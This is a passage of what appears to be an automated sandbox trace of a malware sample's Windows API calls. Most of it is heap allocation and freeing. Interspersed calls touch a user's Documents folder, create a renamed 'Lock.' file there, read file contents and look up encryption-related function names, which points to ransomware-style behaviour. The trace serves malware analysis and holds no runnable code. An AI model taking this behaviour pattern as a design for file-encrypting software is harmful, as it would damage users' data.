0x2e54c98 [0266.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0266.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0266.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.798] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0266.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0266.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0266.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0266.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0266.799] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.pFCcGpVbcXPSBWLa.pps" (normalized: "c:\\users\\fd1hvy\\documents\\lock.pfccgpvbcxpsbwla.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0266.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0266.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0266.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0266.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0266.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0266.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0266.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0266.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0266.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0266.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0266.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0266.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0266.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0266.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0266.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0266.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0266.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0266.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0266.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0266.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0266.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0266.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0266.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0266.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x125b020 [0266.804] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0266.804] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0266.807] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x42d7, lpOverlapped=0x0) returned 1 [0266.808] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0266.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0266.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0266.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0266.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x142d7) returned 0x2f16018 [0266.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x125b020 | out: hHeap=0x970000) returned 1 [0266.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0266.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0266.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0266.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0266.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0266.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x142d7) returned 0x2f2a2f8 [0266.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0266.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0266.815] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0266.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0266.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0266.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x142d7) returned 0x2f16018 [0266.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0266.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0266.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0266.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0266.816] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0266.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0266.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0266.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0266.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0266.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0266.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0266.816] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0266.817] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0266.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0266.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x142d7) returned 0x2f16018 [0266.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d38 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0266.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0266.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0266.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0266.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0266.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0266.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0266.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0266.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x142d7) returned 0xe50048 [0266.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0266.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.826] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0266.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0266.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0266.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.826] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.827] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0266.827] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0266.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0266.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0266.827] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.827] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0266.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0266.828] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0266.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0266.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0266.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0266.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 